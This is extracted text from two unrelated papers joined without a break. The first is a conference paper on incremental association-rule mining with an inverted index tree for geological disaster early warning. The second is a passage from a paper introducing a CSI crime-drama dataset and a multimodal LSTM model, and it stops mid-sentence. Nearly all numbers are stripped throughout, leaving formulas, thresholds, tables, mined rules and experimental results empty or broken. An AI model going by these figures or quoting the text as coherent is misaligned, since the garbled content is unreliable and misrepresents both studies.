sudden geological disasters can cause unmanageable destructive disaster to humans. some slowly changing geological disasters such as landslides, land subsidence and ground fissures will also bring huge losses to the lives and property of the people, the economic development in cities and areas. geological disasters have seriously affected the sustainable development of society and affected social stability. therefore, geological disaster data is an important basic resource related to national economy and the people's livelihood, because the data contains a lot of useful information. but understanding and relying on these data to make scientific international conference on sensor network and computer engineering (icsnce ) decisions is beyond human capacity. how to make full use of geological exploration data to make relevant prediction and scientific decision-making has become one of the concerns of production decision makers. association rule mining[ ] is one of the most explored, most commonly used data mining technology. this method is one of the most active research areas in the field of data mining. it mainly helps to discover the implicit and valuable relationships between data items in massive databases to guide decision makers in various fields such as commerce strategic analysis. researching association rule algorithms in big data technology environment is a very important and challenging research topic. considering that the data in the database of geological disasters always change constantly, the incremental association rule updating techniques have been proposed to effectively maintain the association rules of updated data. the technology should have some characteristics:  the association rules should vary with the data;  the rule updating should avoid dealing with the old data again, as much as possible to use the previous processing results;  updating maintenance methods should be applied to a variety of occasions as much as possible. fup algorithm is iterative update algorithm based on apriori algorithm. in order to solve the problem of incremental updating mining of association rules, cheung and other scholars proposed a fast update algorithm (fup)[ ]. later, domestic scholars such as zhu yuquan proposed a method fukfia[ ] for rapidly updating frequent item sets based on the fup algorithm. they define a new set of frequent items that reduce the number of database scans to a certain extent. inevitably, the above incremental updating algorithm of association rules, like the apriori algorithm, requires layer-by-layer traversal to generate frequent item sets. therefore, there is also the problem of overhead in processing databases and generating huge candidate item sets.fup algorithm[ ] is based on the fup algorithm to improve, put forward an improved algorithm for transaction records in the constantly updated, correct and delete operations. feng yucai and other scholars put forward incremental update association mining algorithm iua and piua[ ]. in the algorithm, splicing and pruning techniques are used to solve the generation of candidate item sets. when the transaction database is unchanged and the minimum support threshold is changed. cats-tree algorithm[ ], iuar algorithm[ ] are through a variety of methods to reduce the number of scanning the original database to achieve incremental update association rules maintenance issues. to sum up, the fup algorithm and the fup algorithm are used to maintain the incremental updating association mining when the minimum support threshold and the minimum confidence threshold do not change, and the transaction records are continuously updated. iua algorithm, piua algorithm and cats-tree algorithm handle the maintenance of incremental updating association mining when the transaction record data does not change, the minimum support threshold and the minimum confidence threshold change. the iuar algorithm is used to solve the problem of maintaining and updating the association mining when the transaction database is continuously updated and the minimum support threshold is changed. the basic idea of the algorithm is to obtain the extended set of candidate frequent items by reducing the support degree. when accessing the updated database, the association rules are incrementally updated by constantly updating the candidate frequent item sets. although this algorithm has been greatly optimized in terms of the large number of candidate item sets, there are still some shortcomings that it is necessary to retrieve the original transaction database multiple times and produce a large number of candidate item sets. so far, there has been relatively little research on incremental updates in the context of big data environments when both the transaction database and the minimum support threshold are changed. therefore, it is very necessary to find an incremental update mining method that can effectively solve such problems. in this paper, we propose an incremental update mining algorithm for inverted index tree, which is applied to geological disaster monitoring system. firstly, the frequent international conference on sensor network and computer engineering (icsnce ) item sets are excavated according to the database, and then the association rules are obtained and analyzed. finally, the association rules are applied to the early warning work. ii. inverted index and inverted index tree a. inverted index the inverted index is the most commonly used data structure in the information retrieval system. in the index, each index item consists of the attribute value and the location information that appears,<key, storage address>. at the time of querying, you can get all the documents that contain the keyword at once, so the retrieval efficiency is higher than the forward index. for example, table is a partial transaction log of the groundwater table (derived from the original transaction database of the geological disaster monitoring system), and figure is the inverted index map (iip)[ ] of table i. table i. groundwater table in geological disasters database (mm) id groundwater level figure . table.i corresponds to the inverted index map(iip) b. inverted index tree based on b+ tree implementation b+ tree is the deformation of the b-tree. a m-order b+ tree[ ] should meet the following characteristics:  the number of keywords per node is equal to the number of children. the keywords of all non-lowest inner nodes are the largest keywords on the corresponding sub-tree, and the bottom node contains all the keywords;  branch nodes can be placed (m- ) keyword, leaf nodes can put m keywords;  all leaf nodes are in the same layer of the number structure and do not contain any information. thus, the tree height of the tree is balanced. b+ tree is a commonly used index mechanism in the database and a one-dimensional data index structure design[ ]. as shown in figure , a b+ tree consisting of the divided character string is m= . figure . order three of the b+ tree international conference on sensor network and computer engineering (icsnce ) iii. algorithm of incremental updating rule mining for inverted index tree the above traditional frequent item sets mining algorithm has disadvantages when generating association rules mining will generate a large number of candidate item sets and repeat retrieval processing of the original database. in this paper, we implement the inverted index tree based on the characteristics of b+ tree and put forward the incremental update association mining algorithm of inverted index tree to deal with the association rules efficiently. a. basic ideas  statistics in the database transaction items, get transaction items set.  constructs the inverted index tree (iitree) based on the b+ tree creation method. the bottom-most leaf node of iitree contains all the item sets. the frequent item sets are obtained by comparing the number of items with the minimum support, and other infrequent item sets remain in their leaf nodes to ensure that future data updating become frequent nodes. the different item sets in the frequent item sets are combined and their confidences are calculated. when the confidence is greater than the minimum confidence, the item set combination is the association rule. compared with the previous incremental updating correlation mining algorithm, inverted index tree incremental updating association mining algorithm introduces b+ tree structure, as well as the database settings. when adding new data, we only need to retrieve the frequent item sets that deal with the new part of the data without the need to re-retrieve the entire database. the algorithm takes advantage of the b+ tree's balanced tree properties. the leaf nodes at the bottom of the tree contain all the keywords of the whole tree, and they are linked together like a doubly linked list. the inverted index[ ] is realized based on the b+ tree . b. set the threshold the minimum support threshold and the minimum confidence threshold will change with different user needs and database updates. when the threshold is set too low, the more rules that are excavated, the lower the usefulness of the rules. conversely, when the threshold is set too high, there are few rules for mining, so some useful rules will be lost. therefore, setting the appropriate threshold is very important when dealing with incremental databases.  when mining association rules for the first time, setting the minimum support threshold is a trial and error. select a small part of data sets randomly from the entire database to be excavated, set initial support thresholds and confidence thresholds according to the user's requirements or experience, and obtain n number of association rules. compare n with the number of association rules the user expects m. if dnn  ' / , it is considered that the threshold set by the user is smaller, so that the excess number of rules dug up is expected. we should increase the support threshold by a certain value and rerun it. if dnnb  ' / ,it is considered that the user is substantially satisfied with the result of the association rule mined at this support threshold. if bnn  ' / ,it is considered that the set threshold is too large, some important rules may be lost, and then a slightly smaller support threshold is selected to re-excavate the algorithm.  when the transaction database is updated, it is possible that the previously set threshold is no longer applicable, so the threshold needs to be reset. based on the support threshold, confidence threshold, the number of association rules output by the algorithm at the last time and the current mining targets, the newton interpolation formula is used to predict the support threshold that should be adopted currently, which makes the mining association rules more effective . international conference on sensor network and computer engineering (icsnce ) c. algorithm implementation in order to achieve the inverted index[ ] with the b+ tree, inverted index tree incremental update association mining algorithm is proposed. ) the algorithm steps are briefly described as follows: a) traverse the inverted index map, get the item set. based on the data of groundwater level, soil moisture content, rainfall and topography in the database of geological disaster monitoring system, inverted index maps were established. traversing the index graph to get the item set, and then by the b+ tree to build inverted index tree. b) get all frequent item sets based on the generated iitree. in the b+ tree, the bottom leaf node contains all the keywords. then, the confidence level is calculated for the combinations of different item sets in frequent item sets, and the correlation rules are obtained, and the correlation analysis of the rules is carried out to obtain a more realistic association rule. c) when the transaction database update records, in accordance with the above steps to retrieve some of the new data processing, the item set inserted iitree. add a keyword to the leaf node at the bottom of the iitree. if the number of keywords contained in the node does not exceed m, the insertion is successful. otherwise, the node needs to be split. the number of keywords included in the two new nodes after splitting should not be less than (m/ + ). if the parent node of the node has enough space (m/ ~ m- ), the parent node should contain the smallest keyword in the right node. otherwise, the parent node is split and a new keyword is added to the parent of the parent node, followed by a higher order until the new root node is generated ( ~ m- ). d) after the database is updated, repeat the step operation and then generate the association rules. incremental update is illustrated by groundwater level data. table ii is the database updating data, figure is the entire database corresponding to the ii tree. table ii. update the record data (mm) id groundwater level figure . inverted index tree of updated data ) algorithm flow chart shown in figure : figure . flow chart of incremental index updating algorithm of inverted index tree mining international conference on sensor network and computer engineering (icsnce ) )(*)( )( ),( bpap bap bacorr u  d. correlation analysis of association rules although, association rules have metrics of interest such as support and confidence. however, association rules may include causal association as well as random association or even negative correlation. here's an example to illustrate: in a supermarket database system, the customer's product purchase information is recorded. of the purchases, of them included bread, had cookies, had both breads and biscuits. if you set a minimum support of % and a minimum confidence of %, then can get the following association rules: rule : buy bread ⇒ buy biscuits %} %, {sup  confidenceport in reality buying bread and buying biscuits may be negative because buying bread will reduce the number of people buying biscuits. at the same time, consider the following negative correlation rules: rule : buy bread ⇒ do not buy cookies %} %, {sup  confidenceport in a sense, the second rule is more realistic. thus, under given threshold conditions, two contradictory rules are obtained. it can be seen from the above examples that judging the true meaning of association rules can not be based solely on the measure of support and confidence, but rather on a comprehensive examination of the data set. to do this, put forward some other methods such as chi-square statistics or correlation analysis[ ]. the core idea of these methods is to measure the correlation between data items. chi-square statistics calculation formula is as follows(  ): ( ) if chi-square statistics is zero, then there is no dependency between the data item a and the data item b, and they are independent of each other. otherwise, the data items are interdependent. relevance calculations more clearly show that this dependence is mutual promotion or mutual restraint. correlation is calculated as follows: ( ) if ),( bacorr is equal to , then data item a and data item b are independent; if ),( bacorr is greater than , data item a and data item b are positively correlated; if ),( bacorr is less than , then data item a and data item b are negative related. support-confidence frame theory is not perfect: some rules are of no practical value, even if both support and confidence are high. the association rule ba  does not give the user information whether a and b are constructive or counterproductive. relevance analysis of association rules is to overcome this deficiency, allowing users to rationally view the association rules. therefore, after the association rules of the geological disaster monitoring system database are excavated, the correlation analysis should be carried out to ensure the practicability of this rule. if it is determined that the rule is positively correlated, the value of the rule is used as the alarm threshold of the geological hazard monitoring system. in the future of new data acquisition, if the conditions of this rule, then the alarm. people can prevent it in advance. iv. experiment results and analysis the algorithm uses the record of rainfall, groundwater level, soil water content and topography data of shang nan county in shang luo city in the geological disaster monitoring system of last year as the experimental data set. use c language in win , dual-core . ghz cpu, gb memory on the pc for simulation. a. comparison of iitree algorithm and iuar algorithm ) the analysis of time complexity of the algorithm: a) when the data is updated, only in the database to scan the updated data; b) when building an inverted index tree, scan the tree structure once and insert the new item set. analysis shows that )(*)( )]()(*)([ ),( bpap bapbpap ba u  international conference on sensor network and computer engineering (icsnce ) when the minimum support is constant, the execution time of the algorithm is related to the amount of data updated each time. to extract a small number of experimental samples from the data set, the minimum support for controlling iuar algorithm is unchanged ( . ), increase the amount of updated data in turn. record the experiment time of iuar algorithm and iitree algorithm respectively, time comparison shown in figure : table iii. iuar, iitree algorithm to run the experimental time(s) data set time twenty thousand <no new ones> iuar iitree forty thousand <add , > iuar iitree eighty thousand <add , > iuar iitree one hundred thousand <add , > iuar iitree figure . algorithms time comparison for iuar and iitree as shown in figure , when the minimum support is constant, the execution time of the iuar algorithm increases rapidly but the ones of the iitree algorithm grows more slowly when the amount of updated data increases. in the same amount of data, iuar algorithm takes more time than iitree. ) the analysis of spatial complexity of the algorithm: a) in the inverted index map, only the updated data is stored, so the size of the memory space is related to the amount of updated data; b) in the iitree algorithm, the frequent item sets determined by the minimum support are stored, so the memory space is associated with the minimum support. this experiment mainly studies the effect of minimum support on memory usage. when the minimum support of iuar algorithm is changed from . to . , the data samples and increments remain unchanged. new records have been added to the raw groundwater level data set as test samples. the memory usage of iuar algorithm and iitree algorithm is compared according to the experimental results. figure . memory usage comparison figure shows that the smaller the minimum support, the more the number of item sets produced, the greater the memory footprint. in the case of support change, the iuar algorithm updates the candidate set with the change of the support degree, saves the candidate item set and the frequent item set in the memory space. the iitree algorithm does not generate the candidate item set in the change of the support degree, so the occupied memory space by iuar algorithm is greater than the ones by iitree algorithm. b. application of iitree algorithm in geological disaster monitoring system if the relationship between the table properties are boolean attributes, then mining rules from this relational table are boolean rules. the problem now is that geological disaster monitoring system databases are numerical data. the quantitative attributes must be dealt with in a necessary way so international conference on sensor network and computer engineering (icsnce ) that the mining of quantitative rules can be transformed into the mining of boolean rules. the main strategy is to divide the range of the number attribute into intervals, and to decompose a quantity attribute into several boolean attributes. in order to reduce the computational workload, the original data are standardized and divided into different sections. the data are grouped according to the sections and the frequency is recorded in the iitree. then the frequent item sets can be excavated. the frequent item sets are divided according to the average value and divided into low value area and high value area respectively. data of groundwater level, rainfall, soil moisture content and ground deformation in the past year were selected from the database of geological disasters and the association rules were excavated. select some of the data for analysis, as shown in table iv: table iv. disaster monitoring data to boolean data conversion table nu m ground water level rainfall soil moisture content ground deformation id l g h g l r h r l s h s s d b d ... ... ... ... ... ... ... ... ... according to the data of geological hazard monitoring system, the association rule mining is carried out and a series of rules are obtained. some rules are as follows: rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = after analyzing the above rules, we can get:  in the case of high groundwater tables, heavy rainfall, and high soil moisture levels, large-scale deformation of the ground is promoted (according to rules and );  under conditions of heavy rainfall, the deformation of the ground may also be induced, even if the groundwater level and soil moisture are not high (according to rule );  when the groundwater level and soil moisture content is high, it is possible to promote the occurrence of ground deformation (according to rule );  when the groundwater level is low, the soil moisture content is low and the rainfall is very little, the ground will be deformed due to dryness (according to rule ). in summary, when the data of the local water table, rainfall, soil moisture content and ground deformation reach the value of the association rules, further analysis can be used as the warning threshold of landslide or ground fissure. v. conclusion in this paper, an algorithm of inverted index tree incremental updating association mining (iitree) is proposed. the algorithm is effectively implemented when the database is updated, without having to scan the original database. the new data will be inserted into the original b+ tree to get frequent item sets. experiment results show that the iitree algorithm consumes less than / of the iuar algorithm when the number of transactions and the amount of new data are the same, which improves the efficiency of data processing. when the minimum support of iuar algorithm changes, iitree algorithm takes up less memory than iuar algorithm. the application of iitree algorithm to the data analysis of geological disaster monitoring system has some improvements in efficiency and memory usage and can be better applied to the early warning of the system. international conference on sensor network and computer engineering (icsnce ) references [ ] rakesh agrawal,tomasz imieliński,arun swami. mining association rules between sets of items in large databases[j]. acm sigmod record, , ( ). [ ] david w.cheung, jiawei han. maintenance of discovered association rules in large databases: an incremental updating technique. in proc of the twelfth international conference on data engineering, .usa: ieee, ( ): - . [ ] zhu yuquan, sun zhizhu, zhao chuan shen.quickly update frequent itemsets[j].computer research and development, ( ): - . [ ] david w l,cheung s,lee d,et al.a general incremental technique for maintaining discovered association rules[c].in proceedings of the fifth international conference on database systems for advanced applications,melbourne,australia, ( ): - . [ ] feng yucai, feng jianlin. incremental updating algorithm for association rules[j] .journal of software, , ( ): . [ ] william cheung, osmar r.zaiane. incremental mining of frequent patterns without candidate generation or support constraint .in proc of the seventh international conference on database engineering and applications symposium, . usa:ieee, ( ): - . [ ] gao feng, xie jianying.discover the incremental update algorithm of association rules[j].computer engineering, ( ): - + . [ ] li wen,hong qin,teng zhongjian,shi zhaoying. an inverted index based on b+ tree [j]. computer knowledge and technology, , ( ): . [ ] hu yanbo,zhong jun. based on clustering b + tree database index optimization algorithm [j]. computer applications, , ( ): . [ ] roh hongchan, kim woo-cheol, kim seungwoo, et, al. a b-tree index extension to enhance response time and the life cycle of flash memory[j]. information sciences, , : . [ ] wang yingqiang,shi yongsheng. application of b+ tree in database index[j]. journal of yangtze university, , ( ): . [ ] chen xiaojiang, huang zhang chan.numerical analysis[m].beijing: science press, : - . whodunnit? crime drama as a case for natural language understanding lea frermann shay b. cohen mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab l.frermann@ed.ac.uk scohen@inf.ed.ac.uk mlap@inf.ed.ac.uk abstract in this paper we argue that crime drama ex- emplified in television programs such as csi: crime scene investigation is an ideal testbed for approximating real-world natural language understanding and the complex inferences as- sociated with it. we propose to treat crime drama as a new inference task, capitalizing on the fact that each episode poses the same ba- sic question (i.e., who committed the crime) and naturally provides the answer when the perpetrator is revealed. we develop a new dataset based on csi episodes, formalize per- petrator identification as a sequence labeling problem, and develop an lstm-based model which learns from multi-modal data. exper- imental results show that an incremental in- ference strategy is key to making accurate guesses as well as learning from representa- tions fusing textual, visual, and acoustic input. introduction the success of neural networks in a variety of ap- plications (sutskever et al., ; vinyals et al., ) and the creation of large-scale datasets have played a critical role in advancing machine under- standing of natural language on its own or together with other modalities. the problem has assumed several guises in the literature such as reading com- prehension (richardson et al., ; rajpurkar et al., ), recognizing textual entailment (bowman et al., ; rocktäschel et al., ), and notably question answering based on text (hermann et al., our dataset is available at https://github.com/ edinburghnlp/csi-corpus. ; weston et al., ), images (antol et al., ), or video (tapaswi et al., ). in order to make the problem tractable and amenable to computational modeling, existing ap- proaches study isolated aspects of natural language understanding. for example, it is assumed that un- derstanding is an offline process, models are ex- pected to digest large amounts of data before being able to answer a question, or make inferences. they are typically exposed to non-conversational texts or still images when focusing on the visual modality, ignoring the fact that understanding is situated in time and space and involves interactions between speakers. in this work we relax some of these sim- plifications by advocating a new task for natural lan- guage understanding which is multi-modal, exhibits spoken conversation, and is incremental, i.e., un- folds sequentially in time. specifically, we argue that crime drama exempli- fied in television programs such as csi: crime scene investigation can be used to approximate real-world natural language understanding and the complex in- ferences associated with it. csi revolves around a team of forensic investigators trained to solve crim- inal cases by scouring the crime scene, collecting irrefutable evidence, and finding the missing pieces that solve the mystery. each episode poses the same “whodunnit” question and naturally provides the an- swer when the perpetrator is revealed. speculation about the identity of the perpetrator is an integral part of watching csi and an incremental process: viewers revise their hypotheses based on new evi- dence gathered around the suspect/s or on new in- ferences which they make as the episode evolves. we formalize the task of identifying the perpetra- tor in a crime series as a sequence labeling problem. transactions of the association for computational linguistics, vol. , pp. – , . action editor: marco baroni. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. like humans watching an episode, we assume the model is presented with a sequence of inputs com- prising information from different modalities such as text, video, or audio (see section for details). the model predicts for each input whether the per- petrator is mentioned or not. our formulation gen- eralizes over episodes and crime series. it is not spe- cific to the identity and number of persons commit- ting the crime as well as the type of police drama under consideration. advantageously, it is incre- mental, we can track model predictions from the beginning of the episode and examine its behavior, e.g., how often it changes its mind, whether it is con- sistent in its predictions, and when the perpetrator is identified. we develop a new dataset based on csi episodes which contains goldstandard perpetrator mentions as well as viewers’ guesses about the perpetrator while each episode unfolds. the se- quential nature of the inference task lends it- self naturally to recurrent network modeling. we adopt a generic architecture which combines a one-directional long-short term memory network (hochreiter and schmidhuber, ) with a softmax output layer over binary labels indicating whether the perpetrator is mentioned. based on this architec- ture, we investigate the following questions: . what type of knowledge is necessary for per- forming the perpetrator inference task? is the textual modality sufficient or do other modali- ties (i.e., visual and auditory input) also play a role? . what type of inference strategy is appropriate? in other words, does access to past information matter for making accurate inferences? . to what extent does model behavior simu- late humans? does performance improve over time and how much of an episode does the model need to process in order to make accu- rate guesses? experimental results on our new dataset reveal that multi-modal representations are essential for the task at hand boding well with real-world natural lan- guage understanding. we also show that an incre- mental inference strategy is key to guessing the per- petrator accurately although the model tends to be less consistent compared to humans. in the remain- der, we first discuss related work (section ), then present our dataset (section ) and formalize the modeling problem (section ). we describe our ex- periments in section . related work our research has connections to several lines of work in natural language processing, computer vi- sion, and more generally multi-modal learning. we review related literature in these areas below. language grounding recent years have seen in- creased interest in the problem of grounding lan- guage in the physical world. various semantic space models have been proposed which learn the meaning of words based on linguistic and visual or acous- tic input (bruni et al., ; silberer et al., ; lazaridou et al., ; kiela and bottou, ). a variety of cross-modal methods which fuse tech- niques from image and text processing have also been applied to the tasks of generating image de- scriptions and retrieving images given a natural lan- guage query (vinyals et al., ; xu et al., ; karpathy and fei-fei, ). another strand of re- search focuses on how to explicitly encode the un- derlying semantics of images making use of struc- tural representations (ortiz et al., ; elliott and keller, ; yatskar et al., ; johnson et al., ). our work shares the common goal of ground- ing language in additional modalities. our model is, however, not static, it learns representations which evolve over time. video understanding work on video understand- ing has assumed several guises such as generat- ing descriptions for video clips (venugopalan et al., a; venugopalan et al., b), retrieving video clips with natural language queries (lin et al., ), learning actions in video (bojanowski et al., ), and tracking characters (sivic et al., ). movies have also been aligned to screenplays (cour et al., ), plot synopses (tapaswi et al., ), and books (zhu et al., ) with the aim of improv- ing scene prediction and semantic browsing. other work uses low-level features (e.g., based on face de- tection) to establish social networks of main charac- ters in order to summarize movies or perform genre peter berglund: you're still going to have to convince a jury that i killed two strangers for no reason. grissom doesn't look worried. he takes his gloves off and puts them on the table. grissom: you ever been to the theater peter? there 's a play called six degrees of separation. it 's about how all the people in the world are connected to each other by no more than six people. all it takes to connect you to the victims is one degree. camera holds on peter berglund's worried look. figure : excerpt from a csi script (episode , season : “let the seller beware”). speakers are shown in bold, spoken dialog in normal font, and scene descriptions in italics. gold-standard entity mention annotations are in color. perpetrator mentions (e.g., peter berglund) are in green, while words referring to other entities are in red. classification (rasheed et al., ; sang and xu, ; dimitrova et al., ). although visual fea- tures are used mostly in isolation, in some cases they are combined with audio in order to perform video segmentation (boreczky and wilcox, ) or se- mantic movie indexing (naphide and huang, ). a few datasets have been released recently which include movies and textual data. movieqa (tapaswi et al., ) is a large-scale dataset which contains movies and , questions, each accompanied with five candidate answers, one of which is correct. for some movies, the dataset also contains subtitles, video clips, scripts, plots, and text from the described video service (dvs), a narration service for the visually impaired. moviedescription (rohrbach et al., ) is a re- lated dataset which contains sentences aligned to video clips from movies. scriptbase (gorinski and lapata, ) is another movie database which consists of movie screenplays (without video) and has been used to generate script summaries. in contrast to the story comprehension tasks en- visaged in movieqa and moviedescription, we fo- cus on a single cinematic genre (i.e., crime series), and have access to entire episodes (and their corre- sponding screenplays) as opposed to video-clips or dvss for some of the data. rather than answering multiple factoid questions, we aim to solve a single problem, albeit one that is inherently challenging to both humans and machines. question answering a variety of question an- swering tasks (and datasets) have risen in popularity in recent years. examples include reading compre- hension, i.e., reading text and answering questions about it (richardson et al., ; rajpurkar et al., ), open-domain question answering, i.e., find- ing the answer to a question from a large collection of documents (voorhees and tice, ; yang et al., ), and cloze question completion, i.e., predict- ing a blanked-out word of a sentence (hill et al., ; hermann et al., ). visual question an- swering (vqa; antol et al. ( )) is a another re- lated task where the aim is to provide a natural lan- guage answer to a question about an image. our inference task can be viewed as a form of question answering over multi-modal data, focus- ing on one type of question. compared to previous work on machine reading or visual question answer- ing, we are interested in the temporal characteristics of the inference process, and study how understand- ing evolves incrementally with the contribution of various modalities (text, audio, video). importantly, our formulation of the inference task as a sequence labeling problem departs from conventional ques- tion answering allowing us to study how humans and models alike make decisions over time. the csi dataset in this work, we make use of episodes of the u.s. tv show “crime scene investigation las vegas” (henceforth csi), one of the most successful crime series ever made. fifteen seasons with a total of episodes were produced over the course of fifteen years. csi is a procedural crime series, it follows a team of investigators employed by the las vegas police department as they collect and evaluate ev- episodes with one case episodes with two cases total number of cases min max avg pe r ca se sentences sentences with perpetrator scene descriptions spoken utterances characters type of crime murder accident suicide other table : statistics on the csi data set. the type of crime was identified by our annotators via a multiple-choice questionnaire (which included the option “other”). note that accidents may also involve perpetrators. idence to solve murders, combining forensic police work with the investigation of suspects. we paired official csi videos (from seasons – ) with screenplays which we downloaded from a web- site hosting tv show transcripts. our dataset com- prises csi episodes, each approximately min- utes long. episodes follow a regular plot, they begin with the display of a crime (typically without reveal- ing the perpetrator) or a crime scene. a team of five recurring police investigators attempt to reconstruct the crime and find the perpetrator. during the inves- tigation, multiple (innocent) suspects emerge, while the crime is often committed by a single person, who is eventually identified and convicted. some csi episodes may feature two or more unrelated cases. at the beginning of the episode the csi team is split and each investigator is assigned a single case. the episode then alternates between scenes cover- ing each case, and the stories typically do not over- lap. figure displays a small excerpt from a csi screenplay. readers unfamiliar with script writing conventions should note that scripts typically consist of scenes, which have headings indicating where the scene is shot (e.g., inside someone’s house). char- acter cues preface the lines the actors speak (see boldface in figure ), and scene descriptions explain what the camera sees (see second and fifth panel in figure ). screenplays were further synchronized with the http://transcripts.foreverdreaming.org/ video using closed captions which are time-stamped and provided in the form of subtitles as part of the video data. the alignment between screenplay and closed captions is non-trivial, since the latter only contain dialogue, omitting speaker information or scene descriptions. we first used dynamic time warping (dtw; myers and rabiner ( )) to ap- proximately align closed captions with the dialogue in the scripts. and then heuristically time-stamped remaining elements of the screenplay (e.g., scene descriptions), allocating them to time spans between spoken utterances. table shows some descrip- tive statistics on our dataset, featuring the number of cases per episode, its length (in terms of number of sentences), the type of crime, among other infor- mation. the data was further annotated, with two goals in mind. firstly, in order to capture the character- istics of the human inference process, we recorded how participants incrementally update their beliefs about the perpetrator. secondly, we collected gold- standard labels indicating whether the perpetrator is mentioned. specifically, while a participant watches an episode, we record their guesses about who the perpetrator is (section . ). once the episode is fin- ished and the perpetrator is revealed, the same par- ticipant annotates entities in the screenplay referring to the true perpetrator (section . ). . eliciting behavioral data all annotations were collected through a web- interface. we recruited three annotators, all post- graduate students and proficient in english, none of them regular csi viewers. we obtained annotations for episodes (comprising cases). a snapshot of the annotation interface is pre- sented in figure . the top of the interface provides a short description of the episode, i.e., in the form of a one-sentence summary (carefully designed to not give away any clues about the perpetrator). sum- maries were adapted from the csi season summaries available in wikipedia. the annotator watches the episode (i.e., the video without closed captions) as a sequence of three minute intervals. every three minutes, the video halts, and the annotator is pre- see e.g., https://en.wikipedia.org/wiki/ csi:_crime_scene_investigation_(season_ ). number of cases: case : grissom, catherine, nick and warrick investigate when a wealthy couple is murdered at their house. case : meanwhile sara is sent to a local high school where a cheerleader was found eviscerated on the football field. screenplay perpetrator mentioned? relates to case / /none? (nick cuts the canopy around monica newman.) nick okay, warrick, hit it (warrick starts the crane support under the awning to re- move the body and the canopy area that nick cut.) nick white female, multiple bruising . . . bullet hole to the temple doesn’t help nick . auto on the side warrick yeah, somebody man- handled her pretty good before they killed her figure : annotation interface (first pass): after watch- ing three minutes of the episode, the annotator indicates whether she believes the perpetrator has been mentioned. sented with the screenplay corresponding to the part of the episode they have just watched. while read- ing through the screenplay, they must indicate for every sentence whether they believe the perpetrator is mentioned. this way, we are able to monitor how humans create and discard hypotheses about perpe- trators incrementally. as mentioned earlier, some episodes may feature more than one case. annota- tors signal for each sentence, which case it belongs to or whether it is irrelevant (see the radio buttons in figure ). in order to obtain a more fine-grained picture of the human guesses, annotators are addi- tionally asked to press a large red button (below the video screen) as soon as they “think they know who the perpetrator is”, i.e., at any time while they are ( it ’s a shell casing . ) perpetrator suspect other grissom moves his light to the canopy below perpetrator suspect other figure : annotation interface (second pass): after watching the episode, the annotator indicates for each word whether it refers to the perpetrator. watching the video. they are allowed to press the button multiple times throughout the episode in case they change their mind. even though the annotation task just described reflects individual rather than gold-standard behav- ior, we report inter-annotator agreement (iaa) as a means of estimating variance amongst partici- pants. we computed iaa using cohen’s ( ) kappa based on three episodes annotated by two participants. overall agreement on this task (sec- ond column in figure ) is . . we also measured percent agreement on the minority class (i.e., sen- tences tagged as “perpetrator mentioned”) and found it to be reasonably good at . , indicating that de- spite individual differences, the process of guessing the perpetrator is broadly comparable across partic- ipants. finally, annotators had no trouble distin- guishing which utterances refer to which case (when the episode revolves around several), achieving an iaa of κ = . . . gold standard mention annotation after watching the entire episode, the annotator reads through the screenplay for a second time, and tags entity mentions, now knowing the perpetrator. each word in the script has three radio buttons at- tached to it, and the annotator selects one only if a word refers to a perpetrator, a suspect, or a character who falls into neither of these classes (e.g., a po- lice investigator or a victim). for the majority of words, no button will be selected. a snapshot of our interface for this second layer of annotations is shown in figure . to ensure consistency, annota- tors were given detailed guidelines about what con- stitutes an entity. examples include proper names and their titles (e.g., mr collins, sgt. o’ reilly), pronouns (e.g., he, we ), and other referring expres- sions including nominal mentions (e.g., let’s arrest the guy with the black hat ). inter-annotator agreement based on three episodes and two annotators was κ = . on the perpetrator class and κ = . on other en- tity annotations (grouping together suspects with other entities). percent agreement was . for perpetrators and . for other entities. the high agreement indicates that the task is well-defined and the elicited annotations reliable. after the second pass, various entities in the script are disambiguated in terms of whether they refer to the perpetrator or other individuals. note that in this work we do not use the token- level gold standard annotations directly. our model is trained on sentence-level annotations which we obtain from token-level annotations, under the as- sumption that a sentence mentions the perpetrator if it contains a token that does. model description we formalize the problem of identifying the perpe- trator in a crime series episode as a sequence label- ing task. like humans watching an episode, our model is presented with a sequence of (possibly multi-modal) inputs, each corresponding to a sen- tence in the script, and assigns a label l indicating whether the perpetrator is mentioned in the sentence (l = ) or not (l = ). the model is fully incremen- tal, each labeling decision is based solely on infor- mation derived from previously seen inputs. we could have formalized our inference task as a multi-label classification problem where labels cor- respond to characters in the script. although per- haps more intuitive, the multi-class framework re- sults in an output label space different for each episode which renders comparison of model perfor- mance across episodes problematic. in contrast, our formulation has the advantage of being directly ap- plicable to any episode or indeed any crime series. a sketch of our inference task is shown in fig- ure . the core of our model (see figure ) is a one-directional long-short term memory net- work (lstm; hochreiter and schmidhuber ( ); zaremba et al. ( )). lstm cells are a variant of recurrent neural networks with a more complex figure : overview of the perpetrator prediction task. the model receives input in the form of text, images, and audio. each modality is mapped to a feature representa- tion. feature representations are fused and passed to an lstm which predicts whether a perpetrator is mentioned (label l = ) or not (l = ). figure : illustration of input/output structure of our lstm model for two time steps. computational unit which have emerged as a popular architecture due to their representational power and effectiveness at capturing long-term dependencies. lstms provide ways to selectively store and forget aspects of previously seen inputs, and as a conse- quence can memorize information over longer time periods. through input, output, and forget gates, they can flexibly regulate the extent to which inputs are stored, used, and forgotten. the lstm processes a sequence of (possibly multi-modal) inputs s = {xh ,xh , ...,xhn}. it utilizes a memory slot ct and a hidden state ht which are in- crementally updated at each time step t. given input xt, the previous latent state ht− and previous mem- ory state ct− , the latent state ht for time t and the updated memory state ct, are computed as follows:   it ft ot ĉt   =   σ σ σ tanh  w [ ht− xt ] ct = ft � ct− + it � ĉt ht = ot � tanh(ct). the weight matrix w is estimated during inference, and i, o, and f are memory gates. as mentioned earlier, the input to our model con- sists of a sequence of sentences, either spoken utter- ances or scene descriptions (we do not use speaker information). we further augment textual input with multi-modal information obtained from the align- ment of screenplays to video (see section ). textual modality words in each sentence are mapped to -dimensional glove embeddings, pre- trained on wikipedia and gigaword (pennington et al., ). word embeddings are subsequently concatenated and padded to the maximum sentence length observed in our data set in order to obtain fixed-length input vectors. the resulting vector is passed through a convolutional layer with max- pooling to obtain a sentence-level representation xs. word embeddings are fine-tuned during training. visual modality we obtain the video correspond- ing to the time span covered by each sentence and sample one frame per sentence from the center of the associated period. we then map each frame to a , -dimensional visual feature vector xv using the final hidden layer of a pre-trained convolutional 